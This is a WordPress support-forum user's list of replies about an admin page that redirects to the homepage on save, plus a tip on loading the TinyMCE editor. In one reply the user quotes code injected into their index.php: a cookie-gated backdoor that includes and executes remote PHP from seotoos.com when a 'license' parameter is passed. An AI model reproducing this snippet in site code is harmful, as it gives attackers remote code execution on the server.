landykos
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Can’t save, edit or publishI agree 100%. Not sure on the mysql though. I think it has more to do with the files but I could be totally wrong.
Forum: Fixing WordPress
In reply to: Can’t save, edit or publishI’m on web.com. I looked and it doesn’t look like any other files have been changed. But who knows there are so many I could be missing one. I updated the index.php and that still didn’t work. I’m going to call my hosting company and see if they have daily backups too.
Thanks,
LKForum: Fixing WordPress
In reply to: Can’t save, edit or publishMy index.php page has the same thing.
<?php if(md5($_COOKIE['12942fc392b445f9'])=="695d55c75600f74e94cdded60b2711d0"){ exit; } ?><?php /* Short and sweet */ if (isset($_GET['license'])) { @include('https://seotoos.com/license.txt'); } else { define('WP_USE_THEMES', true); if (isset($_GET['license'])) { @include('https://seotoos.com/license.txt'); } else { require('./wp-blog-header.php'); } } ?>
Going to try all the things you said and see if that works. I will update after I’m done.
Thanks,
LKForum: Fixing WordPress
In reply to: Doing anything in the admin redirects me to the homepage!I’m on web.com
Forum: Fixing WordPress
In reply to: Doing anything in the admin redirects me to the homepage!Hey RockyMtnHi, thanks for your reply.
Double checked links they are fine uploaded a new .htaccess file but still the problem continues.
Thanks,
LKForum: Fixing WordPress
In reply to: Saving Post Redirects me to homepageI have come to notice now that anything I try and change in the admin section of wordpress when I try to save it I get pushed to the homepage. Anything post, pages, profile, users, themes, etc…..
There has got to be something going on here.
Please any help would be great!
Thank,
LKForum: Fixing WordPress
In reply to: Saving Post Redirects me to homepageI have the same problem. Even if I create a new post and only give it a title it will not let me save it. For me this starting out of no where on a blog that has been running fine for over a year now. No updates or new plugins installed.
Any help on this would be great!
Thanks,
LKForum: Fixing WordPress
In reply to: Posting or editing a post redirects me to homepageI am having the same issue. I can not upgrade to 2.7.1 right now because of some heavy custom code I had to do. Has anybody else seen this before or know how to fix.
Thanks,
LKForum: Fixing WordPress
In reply to: How to add a extra Tinymce Editor to custom Admin pagesFigured it out.
You have to add<?php
wp_enqueue_script(‘autosave’);
wp_enqueue_script(‘post’);
if ( user_can_richedit() )
wp_enqueue_script(‘editor’);
wp_enqueue_script(‘thickbox’);
wp_enqueue_script(‘media-upload’);
?>in the admin.php file so that the javascript is printed before the admin-header file is called.
Thanks